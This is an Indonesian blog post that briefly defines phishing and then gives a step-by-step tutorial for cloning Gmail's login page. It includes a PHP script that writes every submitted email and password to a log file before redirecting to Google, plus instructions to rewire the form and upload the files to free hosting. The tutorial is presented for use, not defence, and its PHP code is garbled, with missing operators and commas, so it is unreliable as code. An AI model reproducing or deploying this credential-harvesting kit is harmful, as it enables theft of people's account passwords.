Skip to main content

PHISING DAN CONTOH CARA MEMBUAT PHISING PAGE

Phising merupakan kata plesetan dari bahasa Inggris yang berarti memancing. Dalam dunia yang serba terhubung secara elektronik saat ini, istilah phising banyak diartikan sebagai suatu cara untuk memancing seseorang ke halaman tertentu.
Phising tidak jarang digunakan oleh para pelaku kriminal di internet untuk memancing seseorang agar mendatangi alamat web melalui e-mail, salah satu tujuannya adalah untuk menjebol informasi yang sangat pribadi dari sang penerima email, seperti password, kartu kredit, dll.
Diantaranya dengan mengirimkan informasi yang seakan-akan dari penerima e-mail mendapatkan pesan dari sebuah situs, lalu mengundangnya untuk mendatangi sebuah situs palsu. Situs palsu dibuat sedemikian rupa yang penampilannya mirip dengan situs asli. lalu ketika korban mengisikan password maka pada saat itulah penjahat ini mengetahui password korban. Penggunaan situs palsu ini disebut juga dengan istilah pharming.

Contoh: Membuat Gmail Phising Page
Step 1.
a. Buka website http://gmail.com
b. Klik File > Save Page As (ctrl + s)
  
c. Setelah Anda simpan, ubah nama ServiceLogin.htm menjadi index.htm.

Step 2.
a. Buka notepad dan copy paste script berikut.
PHP Code:
<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle fopen("logs.txt""a");
foreach($_POST as $variable => $value) {
   fwrite($handle$variable);
   fwrite($handle"=");
   fwrite($handle$value);
   fwrite($handle"\r\n");
}
fwrite($handle"\r\n");
fclose($handle);
exit;
?>
Save it as mail.php
b. Buka notepad dan copas script berikut:
ltmpl=default
ltmplcache=2
continue=http://mail.google.com/mail/?
service=mail
rm=false
Email=victim@gmail.com
Passwd=victimpassword
rmShown=1
signIn=Sign in
Save as logs.txt

Step 3.
a. Open Index.htm dengan notepad dan cari script berikut:
Ganti script tersebut dengan script berikut ini:
<form id="gaia_loginform" action="mail.php" method="post"

Step 4.
a. Sekarang kita mempunyai 4 files
b. Upload semua file tersebut ke webhosting (yang gratisan jg bolehhhh) dan jangan lupa chmod "logs.txt" adalah 777

Sekian semoga ini bermanfaat.

Salam.
Labels:

Comments

Post a Comment

Popular posts from this blog

SCAN VIRUS DENGAN NETSTAT

Hi... All.. Langsung aja ke penjelasan yach... Berikut adalah Langkah-langkah nya: 1. Buka Task Manager (ctrl + alt + del) 2. Klik View dan Pilih Select Columns
Post a Comment
Read more

WEBSITE ERROR SAAT DI BUKA

Mungkin diantara Kita pernah mengalami masalah saat membuka website, dan yang keluar bukan isi konten secara keseluruhan dari website tersebut, melainkan error (Page not Found), atau bahkan blank dan tidak muncul sama sekali. Dan jika mengalami masalah seperti ini, pasti Kita dibuat kesal dan bertanya-tanya, “Apakah Server sedang Down?” atau ada masalah apa? Apalagi website kita termasuk yang memiliki traffic tinggi dan kalau sampai tidak bisa dibuka, berapa kerugian yang diakibatkan oleh masalah tersebut. Dan hal yang paling sering di lakukan oleh kita sebagai user dari sebuah hosting shared adalah berbentuk protes dan beranggapan bahwa server sedang down atau sedang mengalami masalah uptime. Kadang di hosting Kami Dreamlandhost juga pernah mengalami masalah seperti itu, tapi setelah dilakukan pengecekan, hoster lain juga mengalami hal yang sama user marah2 karena websitenya tidak bisa di akses di komputernya sendiri, tetapi di komputer lain dengan koneksi internet lain, halaman
Post a Comment
Read more